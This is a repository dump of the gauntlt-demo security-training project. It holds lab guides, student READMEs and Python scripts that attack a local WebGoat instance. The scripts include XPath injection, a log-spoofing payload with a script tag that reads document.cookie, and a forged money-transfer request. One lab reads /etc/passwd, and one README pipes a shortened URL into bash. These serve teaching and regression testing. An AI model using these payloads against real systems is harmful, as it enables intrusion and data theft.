47 |
--------------------------------------------------------------------------------
/vendor/gruyere/source/resources/newaccount.gtl:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Gruyere: Profile
6 | [[include:base.css]][[/include:base.css]]
7 |
8 |
9 |
10 | [[include:menubar.gtl]][[/include:menubar.gtl]]
11 | Gruyere: Home
6 | [[include:base.css]][[/include:base.css]]
7 |
9 |
10 |
11 |
12 | [[include:menubar.gtl]][[/include:menubar.gtl]]
13 |
29 | """
30 | Then the output should contain: # aruba-0.5.3/lib/aruba/cucumber.rb:113
31 | """
32 | 8008
33 | """
34 |
35 | 1 scenario (1 passed)
36 | 4 steps (4 passed)
37 | ```
38 |
--------------------------------------------------------------------------------
/labs/sxsw-2015/06_Port Check.md:
--------------------------------------------------------------------------------
1 | ## Port checking with nmap
2 | Gauntlt supports nmap. Lets write a real simple port check attack.
3 |
4 | To get started with this, go to `examples/port_check` and open up `challenge_port-check.attack`. Besides using `Background` there is one new concept that we are using in this challenge. We use the `And the following profile:` which is the same as saying `Given the following profile:`.
5 |
6 | ### Profiles
7 | Gauntlt uses profiles in setup steps to pass in values to the subsequent steps. These profiles must start with the first line of `| name | value |` but after that you can assign names and values as you see fit. Once we work with attack aliases we will see why that is important.
8 |
9 | ### Try the challenge
10 | Edit the `challenge_port-check.attack` and try to test to see if port 8008 is open. You can run `$ bundle exec gauntlt challenge_port-check.attack` to see if your solution works. Check the README.md in `examples/port_check` for hints.
11 |
12 | ### Solution
13 | The answer is in `final_port-check.attack` and you can compare it to your solution. Run `$ bundle exec gauntlt final_port-check.attack` and you should see the following output:
14 |
15 | ```
16 | @final @slow
17 | Feature: check to make sure the right ports are open on our server
18 |
19 | Background: # port_check/final_port-check.attack:4
20 | Given "nmap" is installed # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:4
21 | And the following profile: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/gauntlt.rb:9
22 | | name | value |
23 | | host | localhost |
24 |
25 | Scenario: Verify server is open on expected ports # port_check/final_port-check.attack:10
26 | When I launch an "nmap" attack with: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:8
27 | """
28 | nmap -F
29 | """
30 | Then the output should contain: # aruba-0.5.3/lib/aruba/cucumber.rb:113
31 | """
32 | 8008
33 | """
34 |
35 | 1 scenario (1 passed)
36 | 4 steps (4 passed)
37 | ```
38 |
--------------------------------------------------------------------------------
/labs/velocity-eu-2013/06_Port Check.md:
--------------------------------------------------------------------------------
1 | ## Port checking with nmap
2 | Gauntlt supports nmap. Lets write a real simple port check attack.
3 |
4 | To get started with this, go to `examples/port_check` and open up `challenge_port-check.attack`. Besides using `Background` there is one new concept that we are using in this challenge. We use the `And the following profile:` which is the same as saying `Given the following profile:`.
5 |
6 | ### Profiles
7 | Gauntlt uses profiles in setup steps to pass in values to the subsequent steps. These profiles must start with the first line of `| name | value |` but after that you can assign names and values as you see fit. Once we work with attack aliases we will see why that is important.
8 |
9 | ### Try the challenge
10 | Edit the `challenge_port-check.attack` and try to test to see if port 3000 is open. You can run `$ bundle exec gauntlt challenge_port-check.attack` to see if your solution works. Check the README.md in `examples/port_check` for hints.
11 |
12 | ### Solution
13 | The answer is in `final_port-check.attack` and you can compare it to your solution. Run `$ bundle exec gauntlt final_port-check.attack` and you should see the following output:
14 |
15 | ```
16 | @final @slow
17 | Feature: check to make sure the right ports are open on our server
18 |
19 | Background: # port_check/final_port-check.attack:4
20 | Given "nmap" is installed # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:4
21 | And the following profile: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/gauntlt.rb:9
22 | | name | value |
23 | | host | localhost |
24 |
25 | Scenario: Verify server is open on expected ports # port_check/final_port-check.attack:10
26 | When I launch an "nmap" attack with: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:8
27 | """
28 | nmap -F
29 | """
30 | Then the output should contain: # aruba-0.5.3/lib/aruba/cucumber.rb:113
31 | """
32 | 3000
33 | """
34 |
35 | 1 scenario (1 passed)
36 | 4 steps (4 passed)
37 | ```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | [](https://travis-ci.org/gauntlt/gauntlt-demo)
2 |
3 | # Gauntlt Demo
4 | This is a demo set of attacks that can be used to demo gauntlt and learn how to implement it. Each directory in `./examples` contains a specific type of attack that you might want to run. Inside each example you will find a README.md which will have a challenge and some hints on how to solve it. We recommend reading that first and then try to create an attack to solve the challenge.
5 |
6 | ## Installation
7 | ```
8 | $ git clone https://github.com/secure-pipeline/gauntlt-demo
9 | $ cd ./gauntlt-demo
10 | $ git submodule update --init --recursive
11 | $ bundle
12 | ```
13 |
14 | ## Start targets
15 | This includes gruyere and railsgoat as a target to pratice against and in the future we will bundle other services. To start the default targets run the following.
16 | ```
17 | $ bundle exec start_services
18 |
19 | # For some reason railsgoat doesnt exit cleanly from a Ctl-C with service manager so you
20 | # will have to stop it manually
21 | # ps -ef | grep rails
22 | # kill -9
23 | # Please send a pull request if you know how to fix this
24 | ```
25 |
26 | You can also run the following to start individual targets which include: railsgoat and gruyere
27 | ```
28 | $ bundle exec start_services config/railsgoat.rb
29 | $ bundle exec start_services config/gruyere.rb
30 | ```
31 | After you stop the service, you may have to kill the process manually.
32 |
33 | For railsgoat, you can also just do the following:
34 | ```
35 | $ cd vendor/railsgoat
36 | $ bundle install --binstubs
37 | $ rake db:setup
38 | $ rake server:start
39 | ```
40 |
41 | ## Run a Gauntlt attack
42 | Once you have a target ready, you can start customizing attacks and testing them against the target.
43 | ```
44 | $ cd ./examples
45 | $ bundle exec gauntlt hello_world/hello_world.attack
46 | ```
47 |
48 | ## Work through the examples
49 | You might find it helpful to head over to `./examples` and work through the examples. After running `hello_world` it might be good to start with `port_check`
50 |
51 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-25/readme.md:
--------------------------------------------------------------------------------
1 | TEST vuln-25.attack
2 |
3 | This is a Gauntlt test to check of the vulnerability in WebGoat located at Insecure Configuration => Forced Browsing (vuln-25) exists.
4 |
5 | It will print:
6 |
7 | "vuln-25 present" if the vulnerability is present
8 | "vuln-25 not present" if the vulnerability is fixed (not present)
9 |
10 | This test assumes 3 things:
11 |
12 | (1) That pip is installed on the machine so that you can run sudo pip install requests to install the requests python library
13 |
14 |
15 | (2) That the machine has Gauntlt and WebGoat installed and both are configured properly
16 |
17 |
18 | (3) There is a local proxy running on 127.0.0.1:8888 and that FoxyProxy in Iceweasel needs to be updated to have ZAP on 8888
19 |
20 |
21 | (4) The script ./webgoat/vuln-25/vuln-25-runner is in the path aka $PATH. This can be done and confirmed with:
22 |
23 | $ sudo cp webgoat/vuln-25/vuln-25-runner /usr/bin/
24 | $ sudo chmod 775 /usr/bin/vuln-25-runner
25 | $ which vuln-25-runner
26 | /usr/bin/vuln-25-runner
27 | Testing vuln-25 can be done outside of Gauntlt by navigating to the webgoat/vuln-25 directory and running:
28 | $ ./exploit-vuln-25.py
29 |
30 | (5) Make sure that the correct environment variables for rvm are setup correctly. We used:
31 |
32 | [~/]$ source /home/hacker/.rvm/scripts/rvm
33 | [~/]$ echo "source /home/hacker/.rvm/scripts/rvm/" >> /home/hacker/.bashrc
34 |
35 | (6) To run our Gauntlt attack when we placed it in the gauntlt-demo clone we ran the following command:
36 |
37 | [~/]$ gauntlt gauntlt-demo/examples/webgoat/vuln-25/vuln-25.attack
38 |
39 | We had to do this because if we navigated to where our attack file was, the gauntlt command wasn't recognized
40 | but running the command above allowed us to run our attack file from where it was in the gauntlt-demo clone
41 |
42 | Also note that in our runner file we have the path set to
43 |
44 | /home/hacker/gauntlt-demo/examples/webgoat/vunl-25/
45 |
46 |
47 | UT CS 361 Fall 2015
48 | Team name: blues
49 | Team members: Stormy Emery, Bikranta Malla
50 |
51 | Team member:Bikranta Malla
52 | This Gauntlt test was written by Stormy Emery and Bikranta Malla on Sunday, 06 Dec 2015
53 |
54 |
55 |
--------------------------------------------------------------------------------
/vendor/gruyere/source/resources/lib.js:
--------------------------------------------------------------------------------
1 | /* Copyright 2010 Google Inc. */
2 | /**
3 | * Swaps the display settings of two elements. Before calling, exactly one
4 | * of the two elements should have style="display:none" and it shows the one
5 | * that is hidden and hides the one that is shown.
6 | */
7 | function _showHide(id1, id2) {
8 | var x1 = document.getElementById(id1);
9 | var x2 = document.getElementById(id2);
10 | var shown = x1.style.display != '';
11 | x1.style.display = shown ? '' : 'none';
12 | x2.style.display = shown ? 'none' : '';
13 | };
14 |
15 | /**
16 | * Refreshes the current page by loading the url and then passing the
17 | * json response object to the callback.
18 | */
19 | function _refresh(url, callback) {
20 | var httpRequest = window.XMLHttpRequest ? new XMLHttpRequest()
21 | : new ActiveXObject("Microsoft.XMLHTTP");
22 | httpRequest.onreadystatechange = function() {
23 | if (httpRequest.readyState == 4) {
24 | _feed = callback;
25 | eval('(' + httpRequest.responseText + ')');
26 | httpRequest = null;
27 | }
28 | }
29 | httpRequest.open("GET", url, true);
30 | httpRequest.send(null);
31 | };
32 |
33 | /**
34 | * Processes refresh response {'private_snippet':snippet, user:snippet, ...}
35 | */
36 | function _finishRefreshHome(response) {
37 | for (var uid in response) {
38 | var element = document.getElementById(uid);
39 | if (element) {
40 | element.innerHTML = response[uid];
41 | }
42 | }
43 | };
44 |
45 | function _refreshHome(uniqueId) {
46 | _refresh("/" + uniqueId + "/feed.gtl", _finishRefreshHome);
47 | };
48 |
49 | /**
50 | * Processes refresh response [name, snippet, ...]
51 | */
52 | function _finishRefreshSnippets(response) {
53 | var n = response.length;
54 | var element = document.getElementById('user_name');
55 | if (n && element) {
56 | element.innerHTML = response[0];
57 | }
58 |
59 | // The snippet divs are numbered 0, 1, ...
60 | for (var i = 1; i < n; ++i) {
61 | var element = document.getElementById(i - 1);
62 | if (element) {
63 | element.innerHTML = response[i];
64 | }
65 | }
66 | };
67 |
68 | function _refreshSnippets(uniqueId, uid) {
69 | _refresh("/" + uniqueId + "/feed.gtl?uid=" + uid, _finishRefreshSnippets);
70 | };
71 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-14/attack.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import json
4 |
5 | # WebGoat login page URL
6 | URL = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
7 |
8 | def main():
9 | # Start session
10 | session = requests.session()
11 |
12 | # Login info for WebGoat
13 | USERNAME = 'webgoat'
14 | PASSWORD = 'webgoat'
15 |
16 | # List containing login information for WebGoat
17 | login_data = {
18 | 'username': USERNAME,
19 | 'password': PASSWORD
20 | }
21 |
22 | # Landing on the WebGoat Login Page
23 | r = session.get('http://127.0.0.1:8080/WebGoat/login.mvc')
24 |
25 | # Authenticate on the WebGoat login page using the webgoat login information
26 | r = session.post(URL, data=login_data)
27 |
28 | # Need to get menu item link for our vulnerability lesson (XPATH injection)
29 | JSON_URL = 'http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc'
30 | r = session.get(JSON_URL)
31 | parsed_json = json.loads(r.text)
32 | # menu_request_name = parsed_json[10]["children"][3]["name"]
33 | menu_request_link = parsed_json[10]["children"][3]["link"]
34 |
35 | # Store the URL for the XPATH Injection from Injection lesson
36 | LESSON_URL = 'http://127.0.0.1:8080/WebGoat/' + menu_request_link
37 | r = session.get(LESSON_URL)
38 |
39 | # Information of our XPATH injection
40 | EMPLOYEE_NAME = "Mike' or 1=1 or 'a'='a"
41 | ACTION = 'Submit'
42 | PASSWORD = 'test123'
43 |
44 | login_data = {
45 | 'Username' : EMPLOYEE_NAME,
46 | 'Password' : PASSWORD,
47 | 'SUBMIT' : ACTION
48 | }
49 |
50 | # Log in and carry out our attack
51 | r = session.post(LESSON_URL, data=login_data)
52 |
53 | # Return 0 if the vulnerability is present
54 | # Return 1 if the vulnerability has been fixed
55 |
56 | if 'Congratulations' in r.text:
57 | print('1: vulnerability present') # vulnerability present
58 | print('We were able to obtain the following information as a result of our attack:')
59 | print(r.text)
60 | exit(1)
61 | else:
62 | print('0: vulnerability not present') # vulnerability not present, it's been fixed!
63 | exit(0)
64 |
65 | if __name__ == '__main__':
66 | main()
67 |
--------------------------------------------------------------------------------
Add a new snippet.
15 | 16 | [[if:_message]] 17 | 18 | [[/if:_message]] 19 | 20 |
21 |
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/labs/sxsw-2014/05_Hello World with Gauntlt.md:
--------------------------------------------------------------------------------
1 | ## Hello World
2 | From the `gauntlt-demo` directory, run the following
3 | ```
4 | # This should be run from the top-level of `gauntlt-demo`
5 | # and not in labs/sxsw-2014
6 | $ bundle exec gauntlt ./examples/hello_world/hello_world.attack
7 | ```
8 |
9 | If all succeeded, you should see the resulting output
10 | ```
11 | @final
12 | Feature: hello world with gauntlt using the generic command line attack
13 |
14 | Scenario: # ./examples/hello_world/hello_world.attack:3
15 | When I launch a "generic" attack with: # gauntlt-1.0.8/lib/gauntlt/attack_adapters/generic.rb:1
16 | """
17 | cat /etc/passwd
18 | """
19 | Then the output should contain: # aruba-0.5.3/lib/aruba/cucumber.rb:113
20 | """
21 | root
22 | """
23 |
24 | 1 scenario (1 passed)
25 | 2 steps (2 passed)
26 | 0m0.175s
27 | ```
28 |
29 | Notice how we used `Feature` and `Scenario` here. We could have created a `Background` if we had any setup steps that needed to be run before each `Scenario`.
30 |
--------------------------------------------------------------------------------
/labs/sxsw-2015/05_Hello World with Gauntlt.md:
--------------------------------------------------------------------------------
1 | ## Hello World
2 | From the `gauntlt-demo` directory, run the following
3 | ```
4 | # This should be run from the top-level of `gauntlt-demo`
5 | # and not in labs/sxsw-2015
6 | $ bundle exec gauntlt ./examples/hello_world/hello_world.attack
7 | ```
8 |
9 | If all succeeded, you should see the resulting output
10 | ```
11 | @final
12 | Feature: hello world with gauntlt using the generic command line attack
13 |
14 | Scenario: # ./examples/hello_world/hello_world.attack:3
15 | When I launch a "generic" attack with: # gauntlt-1.0.8/lib/gauntlt/attack_adapters/generic.rb:1
16 | """
17 | cat /etc/passwd
18 | """
19 | Then the output should contain: # aruba-0.5.3/lib/aruba/cucumber.rb:113
20 | """
21 | root
22 | """
23 |
24 | 1 scenario (1 passed)
25 | 2 steps (2 passed)
26 | 0m0.175s
27 | ```
28 |
29 | Notice how we used `Feature` and `Scenario` here. We could have created a `Background` if we had any setup steps that needed to be run before each `Scenario`.
30 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-00/jerry-curl-03.config:
--------------------------------------------------------------------------------
1 | # Some examples of items to put in this config file
2 | #
3 | # For repeated requests to the same URL:
4 | BASE=http://127.0.0.1:8080/WebGoat
5 | # NOTE: BASE is the only config option done as a key=value pair.
6 | # All others are simply one command line option per line.
7 | # Make sure the line starts with "BASE="
8 | #
9 | # NOTE: DO NOT QUOTE ARGUMENTS TO COMMAND LINE OPTIONS
10 | # jerry-curl will automagically quote them for you
11 | #
12 | # Proxy curl commands:
13 | --proxy 127.0.0.1:8888
14 | #
15 | # Allow insecure SSL:
16 | # --insecure
17 | #
18 | # Include headers in the output
19 | #-include
20 | #
21 |
22 | # Set headers like IceWeasel /attack?$MENU where $MENU is something like "Screen=1094&menu=100"
23 | -X GET
24 | -A Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
25 | -H Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
26 | -H Accept-Language: en-US,en;q=0.5
27 | -H Referer: http://127.0.0.1:8080/WebGoat/start.mvc
28 | -H Connection: keep-alive
29 |
30 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-00/jerry-curl-02.config:
--------------------------------------------------------------------------------
1 | # Some examples of items to put in this config file
2 | #
3 | # For repeated requests to the same URL:
4 | BASE=http://127.0.0.1:8080/WebGoat
5 | # NOTE: BASE is the only config option done as a key=value pair.
6 | # All others are simply one command line option per line.
7 | # Make sure the line starts with "BASE="
8 | #
9 | # NOTE: DO NOT QUOTE ARGUMENTS TO COMMAND LINE OPTIONS
10 | # jerry-curl will automagically quote them for you
11 | #
12 | # Proxy curl commands:
13 | --proxy 127.0.0.1:8888
14 | #
15 | # Allow insecure SSL:
16 | # --insecure
17 | #
18 | # Include headers in the output
19 | #-include
20 | #
21 |
22 | # Set headers like IceWeasel for /service/lessonmenu.mvc - get menu listing to find our vuln menu link
23 | -X GET
24 | -A Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
25 | -H Accept: application/json, text/plain, */*
26 | -H Accept-Language: en-US,en;q=0.5
27 | -H Referer: http://127.0.0.1:8080/WebGoat/start.mvc
28 | -H Connection: keep-alive
29 | -H Content-Length: 0
30 |
31 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-17/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-17.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located in the String SQL Injection page (vuln-17) exists
4 |
5 | It will return a
6 | - 1 (error) if the vulnerability is present
7 | - 0 (success) if the vulnerability is fixed (not present)
8 |
9 | This test assumes that you have several things installed:
10 |
11 | (1)
12 | WebGoat and Gauntlt are installed and are configured with the correct $PATH
13 |
14 | (2)
15 | the python request library installed. To install, run this line in a Debian-based system terminal:
16 |
17 | $ pip install requests
18 |
19 | If you don't have pip, install pip first:
20 | $ apt-get install python-pip
21 |
22 | Or install the request library in some other way
23 |
24 | (3)
25 | There is a local proxy running on 127.0.0.1:8000
26 |
27 | Testing for vuln-17 can be done by navigating to:
28 | /home/hacker/gauntlt-demo/examples/webgoat/vuln-17
29 |
30 | and running the following line:
31 | $ python attack.py
32 |
33 | This Gauntlt test was written by Ouyangzheng Huang and Kevin Ong
34 |
35 |
--------------------------------------------------------------------------------
/vendor/gruyere/source/resources/menubar.gtl:
--------------------------------------------------------------------------------
1 | {{# Copyright 2010 Google Inc. }}
2 |
28 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-00/jerry-curl-00.config:
--------------------------------------------------------------------------------
1 | # Some examples of items to put in this config file
2 | #
3 | # For repeated requests to the same URL:
4 | BASE=http://127.0.0.1:8080/WebGoat
5 | # NOTE: BASE is the only config option done as a key=value pair.
6 | # All others are simply one command line option per line.
7 | # Make sure the line starts with "BASE="
8 | #
9 | # NOTE: DO NOT QUOTE ARGUMENTS TO COMMAND LINE OPTIONS
10 | # jerry-curl will automagically quote them for you
11 | #
12 | # Proxy curl commands:
13 | --proxy 127.0.0.1:8888
14 | #
15 | # Allow insecure SSL:
16 | # --insecure
17 | #
18 | # Include headers in the output
19 | -include
20 | #
21 |
22 | # Set headers like IceWeasel to /login.mvc - aka request login page
23 | -X GET
24 | -A Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
25 | -H Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
26 | -H Accept-Language: en-US,en;q=0.5
27 | -H Referer: http://127.0.0.1:8080/WebGoat/login.mvc
28 | -H Connection: keep-alive
29 | -H Content-Type: application/x-www-form-urlencoded
30 |
31 |
--------------------------------------------------------------------------------
/vendor/gruyere/source/resources/feed.gtl:
--------------------------------------------------------------------------------
1 | {{# Copyright 2010 Google Inc. }}
2 | _feed((
3 | {{# with a uid parameter, get one user's snippets
4 | returns [name, snippet, ...]
5 | The first entry is the user's name and the remaining entries are
6 | the user's snippets, in order from most recent to least recent.
7 | }}
8 | [[if:uid]]
9 | [
10 | "[[if:_db.*uid]]{{_db.*uid.name}}[[/if:_db.*uid]][[if:!_db.*uid]]{{uid.0}}[[/if:!_db.*uid]]"
11 | [[if:_db.*uid.snippets.0]][[for:_db.*uid.snippets]]
12 | ,"{{_this:html}}"
13 | [[/for:_db.*uid.snippets]][[/if:_db.*uid.snippets.0]]
14 | ]
15 | [[/if:uid]]
16 | {{# without a uid parameter, get one snippet from each user
17 | returns {'private_snippet':snippet, user:snippet, ...}
18 | The first entry is the logged in user's private snippet.
19 | The rest of the entries are all the other users' most recent snippet.
20 | }}
21 | [[if:!uid]]
22 | {
23 | "private_snippet":
24 | "{{_profile.private_snippet:html}}"
25 | [[for:_db]]
26 | [[if:is_author]][[if:snippets.0]],"{{_key}}":
27 | "{{snippets.0:html}}"[[/if:snippets.0]][[/if:is_author]][[/for:_db]]
28 | }
29 | [[/if:!uid]]
30 | ))
31 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-13/exploit-vuln-13.bash:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | ## Pretend this is a working Bash script - for now, this is just a shell
4 | ## For my money, I'd actually write this in Python or Ruby
5 | ## So consider this pseudo-code for now
6 |
7 | # --[ STEP 00 ]--
8 | # Request login page
9 |
10 | # --[ STEP 01 ]--
11 | # Log into WebGoat
12 |
13 | # --[ STEP 02 ]--
14 | # Figure out which menu item is "Http Basics"
15 |
16 | # --[ STEP 3 ]--
17 | # Request the lesson for General => Http Basics
18 |
19 | # --[ STEP 4 ]--
20 | # Submit the attack to the General => Http Basics page
21 | ATTACK=`echo -n "1"`
22 |
23 | # Purposefully fail for testing purposes
24 | #ATTACK=`echo -n "1"`
25 |
26 | # --[ STEP 6 ]--
27 | # Set the correct exit code
28 | # It will return a
29 | # - 0 (error) if the vulnerability is present
30 | # - 1 (success) if the vulnerability is fixed (aka not present)
31 |
32 | if [ $ATTACK -eq 1 ]
33 | then
34 | # Attack successful
35 | echo "Attack Successful"
36 | exit 1
37 | else
38 | # Attack failed - no vuln-13 present
39 | echo "vuln-13 not present"
40 | exit 0
41 | fi
42 |
43 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) 2013 gauntlt
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy of
6 | this software and associated documentation files (the "Software"), to deal in
7 | the Software without restriction, including without limitation the rights to
8 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
9 | the Software, and to permit persons to whom the Software is furnished to do so,
10 | subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
17 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
18 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
19 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
20 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
21 |
--------------------------------------------------------------------------------
/examples/env_vars/README.md:
--------------------------------------------------------------------------------
1 | # Challenge
2 | Gauntlt can use environment variables. Lets use environment variables in attack script profiles. This is useful when the target hostname, paths, or other profile element, for a given attack script differs server-to-server or environment-to-environment.
3 |
4 | For example, you want to run the same attack script in your development, test, and production environments. But the target hostname is different. Setting environment variables in the cucumber profile and using environment variables in the attack script allow you to sync identical attack scripts in all environments.
5 |
6 | Lets revisit our simple port_check but this time use enviroment variables. Start in `challenge_env-vars.attack`
7 |
8 | # Hints
9 | Read this gauntlt wiki page to get started: [Using Cucumber Profiles and Environment Variables with Gauntlt](https://github.com/gauntlt/gauntlt/wiki/Using-Cucumber-Profiles-and-Environment-Variables-with-Gauntlt)
10 |
11 | # Solution
12 | Check `final_env-vars.attack` for a working solution answer. Try changing the environment variable to point to a different host like scanme.nmap.org and running again.
13 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-13/vuln-13.py:
--------------------------------------------------------------------------------
1 | """
2 | """
3 |
4 | import argparse
5 | import re
6 | import json
7 | import sys
8 | import requests
9 |
10 | url1 = 'http://127.0.0.1:8080/WebGoat/login.mvc'
11 | url2 = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
12 | url3 = 'http://127.0.0.1:8080/WebGoat/'
13 |
14 | payload1 = {'username':'webgoat','password':'webgoat'}
15 |
16 | session = requests.Session()
17 | first = session.get(url1)
18 | login = session.post(url2, data=payload1)
19 |
20 | lessonMenu = session.get('http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc')
21 | lessons = lessonMenu.text
22 |
23 | parsed = json.loads(lessons)
24 |
25 | for each in parsed:
26 | if 'Injection Flaws' in (each['name']):
27 | for e in each['children']:
28 | if 'Log Spoofing' in e['name']:
29 | lessonLink = (e['link'])
30 |
31 | payload2 = {'username':'Smith%250d%250aLogin+Succeeded+for+username%3A+admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E+&password=&SUBMIT=Login'}
32 |
33 | log = session.post(url3+lessonLink, data=payload2)
34 | if 'Login Succeeded' in log.text:
35 | print('Attack Successful')
36 | else:
37 | print('Attack Failed')
38 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-41/attack.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import json
3 |
4 | s = requests.Session()
5 |
6 | #Request login page
7 | r = s.get('http://127.0.0.1:8080/WebGoat/login.mvc')
8 | session1 = r.headers['Set-Cookie']
9 | #print session1
10 |
11 | #Log into WebGoat
12 | r = s.post('http://127.0.0.1:8080/WebGoat/j_spring_security_check;jsessionid=' + session1, data={"username":"guest","password":"guest"})
13 | session2 = r.request.headers['Cookie']
14 | #print session2
15 |
16 | #Figure out which menu item is "Silent Transactions Attacks"
17 | r = s.get('http://127.0.0.1:8080/WebGoat/attack?Screen=146&menu=400')
18 | r = s.get('http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc')
19 |
20 | my_dict = r.json()
21 | my_link = my_dict[3]['children'][6]['link']
22 | #print my_link
23 |
24 | #Submit the attack to the AJAX Security => Silent Transactions Attack page
25 | attack_url = 'http://127.0.0.1:8080/WebGoat/' + my_link + '&from=ajax&newAccount=1337&amount=12345&confirm=Confirm'
26 | #print attack_url
27 | r = s.get(attack_url)
28 | #print r.text
29 |
30 | if "silently" in r.text:
31 | print "Attack Successful"
32 | else:
33 | print "Attack Failed"
34 |
35 |
36 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-00/jerry-curl-01.config:
--------------------------------------------------------------------------------
1 | # Some examples of items to put in this config file
2 | #
3 | # For repeated requests to the same URL:
4 | BASE=http://127.0.0.1:8080/WebGoat
5 | # NOTE: BASE is the only config option done as a key=value pair.
6 | # All others are simply one command line option per line.
7 | # Make sure the line starts with "BASE="
8 | #
9 | # NOTE: DO NOT QUOTE ARGUMENTS TO COMMAND LINE OPTIONS
10 | # jerry-curl will automagically quote them for you
11 | #
12 | # Proxy curl commands:
13 | --proxy 127.0.0.1:8888
14 | #
15 | # Allow insecure SSL:
16 | # --insecure
17 | #
18 | # Include headers in the output
19 | -include
20 | #
21 |
22 | # Set headers like IceWeasel to /j_spring_security_check - aka POST login creds
23 | -X POST
24 | --data username=guest&password=guest
25 | -A Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.0
26 | -H Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
27 | -H Accept-Language: en-US,en;q=0.5
28 | -H Referer: http://127.0.0.1:8080/WebGoat/login.mvc
29 | -H Connection: keep-alive
30 | -H Content-Type: application/x-www-form-urlencoded
31 |
32 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-04/README.md:
--------------------------------------------------------------------------------
1 | UT CS 361 Fall 2015
2 | Team: Team Name Not Found
3 |
4 | TEST webgoat_http.attack - Vuln-04
5 |
6 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Code Quality => Discover Clues in the HTML (vuln-04) exists.
7 |
8 | It will return:
9 | - 'Vulnerability Exploited' (1) if the vulnerability was able to be exploited by the python script
10 | - 'Success' (0) if no vulnerabilities were exploited and the web application is secure.
11 |
12 | This assumes that:
13 |
14 | 1. Gauntlt is installed. This can be done through
15 |
16 | ```
17 | curl -sSL http://bit.ly/1MJ3qNp | bash
18 | ```
19 |
20 | The rvm script should also be sourced so that Gauntlt is in your path
21 | ```
22 | source .rvm/scripts/rvm
23 | ```
24 |
25 |
26 | 2. WebGoat is installed and running on 127.0.0.1:8888. WebGoat should be installed with the previous command as well.
27 |
28 | 4. Two python libraries were used in the script, and should be installed and usable with pip.
29 |
30 | ```
31 | apt-get install python pip
32 | pip install requests
33 | ```
34 |
35 |
36 | This Gauntlt test was written by Kelly Wilson and Michael Kloc on Mon, 09 Dec 2015
--------------------------------------------------------------------------------
/examples/webgoat/vuln-09/readme.md:
--------------------------------------------------------------------------------
1 | TEST vuln-09.attack
2 |
3 | This test is related with Cross-Site Scripting (XSS) => HttpOnly Test.
4 | This is a Gauntlt test to check that the WebGoat page is setting correctly the HttpOnly flag for unique2u cookie. The original test involved checking that the browser interprets the flag, but it didn't fit very well the gauntlt testing pattern, so the professor decided to have it test whether the site sets the cookie correctly and process it when it receives it back.
5 |
6 | It will return a
7 | 1 (error) if WebGoat doesn't set the HttpOnly flag for cookie unique2u after pressing the Read Cookie button or if it doesn't print "SUCESS" after the Write Button is pressed afterwards.
8 | 0 (success) otherwise
9 |
10 | This test assumes:
11 | -The attack files (incliding .py) need to be in /home/hacker/cs361/gauntlt-demo/examples/webgoat/vuln-09
12 | -python's requests library must be installed
13 | -WebGoat is running on 127.0.0.1:8080
14 |
15 | To install Python's requests library:
16 | as root:
17 | # apt-get install python-pip
18 | # pip install requests
19 |
20 | This Gauntlt test was written by Andy Ruiz Cabrera (ar48299) as part of the team Frostbyte
21 |
--------------------------------------------------------------------------------
